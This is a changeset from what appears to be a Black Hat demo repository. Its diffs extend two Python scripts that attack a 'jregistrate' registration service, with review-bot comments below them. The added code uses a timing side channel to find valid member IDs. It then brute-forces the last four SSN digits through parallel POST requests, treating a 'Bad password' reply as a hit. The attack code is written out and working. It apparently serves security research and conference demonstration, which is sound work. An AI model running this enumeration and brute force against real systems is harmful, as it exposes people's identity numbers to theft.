Changeset 18


Timestamp:
08/01/15 19:04:49 (9 years ago)
Author:
tim
Message:

.

Files:
2 added
2 edited

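--- a/test/blackhat-demo/jregistrate-attack
+++ b/test/blackhat-demo/jregistrate-attack
@@ -43,4 +43,6 @@
 parser.add_argument('port', nargs='?', type=int, default=8080,
                     help='TCP port number of HTTP service (default: 8080)')
+parser.add_argument('guess', nargs='?', type=str, default=None,
+                    help='Retry a member_id guess')
 options = parser.parse_args()
 
@@ -75,5 +77,4 @@
             session = requests.Session()
             response = session.send(req, verify=False)
-            #print(repr(response.raw._original_response.local_address))
             reported = extractReportedRuntime(response.headers, response.text)
             retry = False
@@ -82,5 +83,4 @@
             time.sleep(1.0)
             sys.stderr.write("ERROR: retrying...\n")
-        #print(data.encode('utf-8'), reported)
        
     return {'userspace_rtt':response.elapsed.microseconds*1000,
@@ -103,4 +103,38 @@
 
 
+def guessSSN(member_id, last_four):
+    method = 'POST'
+    path = '/jregistrate/register'
+    url = "%s://%s:%d%s" % (protocol,hostname,port,path)
+    headers = {"Content-Type":"application/x-www-form-urlencoded"}
+    body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321')
+    req = requests.Request(method, url, headers=headers, data=body).prepare()
+    session = requests.Session()
+    response = session.send(req, verify=False)
+
+    if 'Bad password' in response.text:
+        return True
+    else:
+        return False
+   
+
+def bruteSSN(member_id):
+    from nanownlib.parallel import WorkerThreads
+    wt = WorkerThreads(4, guessSSN)
+   
+    for last_four in range(9999):
+        ssn = "%4d" % last_four
+        wt.addJob(ssn, (member_id,ssn))
+
+    for i in range(9999):
+        ssn,success = wt.resultq.get()
+        if success:
+            wt.stop()
+            return ssn
+
+    wt.stop()
+    return None
+
+
 setCPUAffinity()
 setTCPTimestamps()
@@ -109,18 +143,21 @@
 
 cases = {"invalid":"0012-9999"}
-guesses = [("0012-%d"%id) for id in range(0,9999) if id != 2019]
+guesses = [("0012-%04d"%id) for id in range(0,9999) if id != 2019]
 random.shuffle(guesses)
-num_observations = 100
+num_observations = 250
 trim = (0,0)
-classifier = "septasummary"
-params = {"distance": 25, "threshold": 40094.274}
+classifier = "quadsummary"
+params = {"distance": 5, "threshold": 18761.53575}
 classifierTest = functools.partial(classifiers[classifier]['test'], params, True)
 
+if options.guess != None:
+    guesses = [options.guess]
 
 sid = findMaxSampleID(db) + 1
 for guess in guesses:
     print("Collecting samples for:", guess)
+    start = time.time()
     cases["valid"] = guess
-    stype = "attack_%s" % guess
+    stype = "attack_%s_%d" % (guess, int(time.time()*1000))
     sample_order = list(cases.items())
 
@@ -147,32 +184,13 @@
     sniffer_fp.close()
     num_probes = analyzeProbes(db, trim=trim)
-    print("num_probes: ", num_probes)
 
     if classifierTest(db.subseries(stype, "valid")):
-        print("Found valid member_id: ", guess)
-        break
-
-
-def guessSSN(member_id, last_four):
-    method = 'POST'
-    path = '/jregistrate/register'
-    url = "%s://%s:%d%s" % (protocol,hostname,port,path)
-    headers = {"Content-Type":"application/x-www-form-urlencoded"}
-    body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321')
-    req = requests.Request(method, url, headers=headers, data=body).prepare()
-    session = requests.Session()
-    response = session.send(req, verify=False)
-
-    if 'Bad password' in response.text:
-        return True
+        print("  Looks valid...")
+        ssn = bruteSSN(guess)
+        if ssn == None:
+            print("  Hmm, didn't find an SSN... ")
+        else:
+            print("  W00t! Found SSN: %s" % ssn)
     else:
-        return False
-
-   
-print(guessSSN('0012-5969', '4298'))
-sys.exit(0)
-
-for last_four in range(9999):
-    if guessSSN(guess, "%4d" % last_four):
-        print("Found valid SSN last four digits:", last_four)
-        break
+        print("  Looks invalid")
+    print("  Runtime: ", time.time()-start)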
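Review bot: The relocated `guessSSN` and the new `bruteSSN` (new lines 105–136) have no docstring, and nothing explains why the request deliberately sends mismatched `password=1234` / `conf_pwd=4321` or why a `'Bad password'` reply is treated as success. A docstring such as `"""Return True when the demo server answers 'Bad password' for this member_id/last_four pair."""` would make the demonstrated weakness readable. The reply apparently shows that the id check passed before the password fields were compared, so the comment should also name the application-side remedy, presumably a uniform error for every validation failure plus attempt limiting. As a style matter, `if ssn == None:` and `if options.guess != None:` should be written with `is None` / `is not None`, and the `if`/`else` in `guessSSN` reduces to `return 'Bad password' in response.text`.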
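--- a/test/blackhat-demo/jregistrate-collect
+++ b/test/blackhat-demo/jregistrate-collect
@@ -34,7 +34,5 @@
 parser = argparse.ArgumentParser(
     description="")
-parser.add_argument('-c', dest='cases', type=str, default='{"valid":"0012-5969","invalid":"0012-9999"}',
-                    help='JSON representation of echo timing cases.')
-parser.add_argument('--no-tcpts', action='store_true', help='Disbale TCP timestamp profiling')
+parser.add_argument('--no-tcpts', action='store_true', help='Disable TCP timestamp profiling')
 parser.add_argument('--no-control', action='store_true', help='Do not collect separate control data.  Instead, synthesize it from test and train data.')
 parser.add_argument('session_name', default=None,
@@ -55,5 +53,5 @@
 protocol = 'http'
 
-cases = json.loads(options.cases)
+cases = {"valid":"0012-8846","invalid":"0012-9999"}
 
 
@@ -69,10 +67,10 @@
 
 
-def sendRequest(data=None):
+def sendRequest(case_data):
     method = 'POST'
     path = '/jregistrate/register'
     url = "%s://%s:%d%s" % (protocol,hostname,port,path)
     headers = {"Content-Type":"application/x-www-form-urlencoded"}
-    body = (b'member_id='+data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')
+    body = (b'member_id='+case_data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')
     req = requests.Request(method, url, headers=headers, data=body).prepare()
 
@@ -82,5 +80,4 @@
             session = requests.Session()
             response = session.send(req, verify=False)
-            #print(repr(response.raw._original_response.local_address))
             reported = extractReportedRuntime(response.headers, response.text)
             retry = False
@@ -89,5 +86,4 @@
             time.sleep(1.0)
             sys.stderr.write("ERROR: retrying...\n")
-        #print(data.encode('utf-8'), reported)
        
     return {'userspace_rtt':response.elapsed.microseconds*1000,
@@ -170,5 +166,4 @@
                 sample_order[i] = (sample_order[i][0],sample_order[0][1])
             random.shuffle(sample_order)
-            #print('after', sample_order)
            
         results = []
@@ -179,5 +174,4 @@
                                  sample_order[i][1]))
 
-        #print(results)
         db.addProbes(results)
         db.conn.commit()
@@ -185,7 +179,5 @@
 
         if (time.time() > next_report):
-            #s = time.time()
             reportProgress(db, sample_types, start)
-            #print("reportProgress time:", time.time()-s)
             next_report += report_interval
 
@@ -194,9 +186,6 @@
 stopSniffer(sniffer)
 
-start = time.time()
 associatePackets(sniffer_fp, db)
 sniffer_fp.close()
-end = time.time()
-print("associate time:", end-start)
 
 if options.no_control: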
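Review bot: The `cases` assignment at new line 55 hard-codes the member id while the commit drops the `-c` option that used to supply it, so changing the fixture now means editing the script. If that id is anything other than a throwaway value on the demo server, it is also now recorded in version control. Keeping `cases = json.loads(options.cases)` and only changing the option's default to the new pair would avoid both. The commit message is a bare `.`, so nothing records why the fixture value changed.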